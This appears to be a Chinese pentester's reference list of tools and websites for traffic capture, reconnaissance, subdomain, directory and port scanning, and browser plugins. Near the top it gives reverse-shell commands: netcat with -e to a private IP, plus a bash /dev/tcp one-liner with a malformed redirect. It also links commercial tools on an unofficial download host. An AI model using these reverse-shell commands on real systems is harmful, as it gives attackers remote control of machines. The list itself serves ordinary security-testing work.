常用工具/网站

常用语参考：https://www.cnblogs.com/sunny11/p/13583083.html

操作系统命令：https://wangchujiang.com/linux-command/

常用反弹shell命令：https://forum.ywhack.com/shell.php

nc -lvvp 2333（监听）
nc -e cmd 192.168.1.2 2333
nc -e /bin/bash 192.168.1.2 2333
bash -i &> /dev/tcp/192.168.1.2/2333 0&>1

抓包工具：

Burp Suite：http://ixxzhi.cn/d/tools/burpsuite_pro_v2023.3.zip?sign=O2iSiRMnL7t9Au2KoPBtNnvAjTcA_MCmOjwHpq5kHNY=:0

Charlies：http://ixxzhi.cn/d/tools/charles-proxy-4.6.3-win64.msi?sign=Y6c342qd0Vga3augKrJE3FdhuEHgd7G-96ICYaPK9KQ=:0

Fiddler：http://ixxzhi.cn/d/tools/Fiddler5%E6%B1%89%E5%8C%96%E4%B8%AD%E6%96%87%E7%89%88.zip?sign=11jZMJln-IUY-ihVxFv8zJ2B0zc62qqrtXXDCpbE5wI=:0

Proxifier：http://ixxzhi.cn/d/tools/Proxifier.zip?sign=PTOnT00ZbPc60_OTqzsXdzxeUUFkJ16O0FsuUNUGfHU=:0

信息收集：

综合

• 鹰图：https://hunter.qianxin.com/
• Quake：https://quake.360.net/quake/#/index
• Fofa：https://fofa.info/
• Zoomeye：https://www.zoomeye.org/
• 水泽：https://github.com/0x727/ShuiZe_0x727
• 灯塔：https://github.com/TophantTechnology/ARL

子域收集

• OneForAll：https://github.com/shmilylty/OneForAll
• Layer子域名挖掘机：https://github.com/euphrat1ca/LayerDomainFinder

目录扫描

• 7kbscan：https://github.com/7kbstorm/7kbscan-WebPathBrute
• dirsearch：https://github.com/maurosoria/dirsearch
• dirmap：https://github.com/H4ckForJob/dirmap
• dirb：kali自带
• 御剑：https://github.com/foryujian/yjdirscan

CMS识别

• whatweb

端口扫描

• 御剑
• Nmap
• 常见端口：https://www.bilibili.com/read/cv24871379/?jump_opus=1

浏览器插件

• hackbar：http://ixxzhi.cn/d/tools/hackbar-2.2.9-fx.xpi?sign=VuhRgtm8z5X_dGPCktU0bx57moQ1c16TNOvitQrRzvI=:0（发送请求）
• Wappalyzer：https://www.wappalyzer.com/ （资产收集，中间件开发语言等的识别）
• Cookie-Editor：https://cookie-editor.cgagnier.ca/（支持导入导出Cookie）
• FoxyProxy：https://getfoxyproxy.org（浏览器代理）
• FindSomething：https://github.com/ResidualLaugh/FindSomething/tree/firefox（从js找到一些有趣的东西）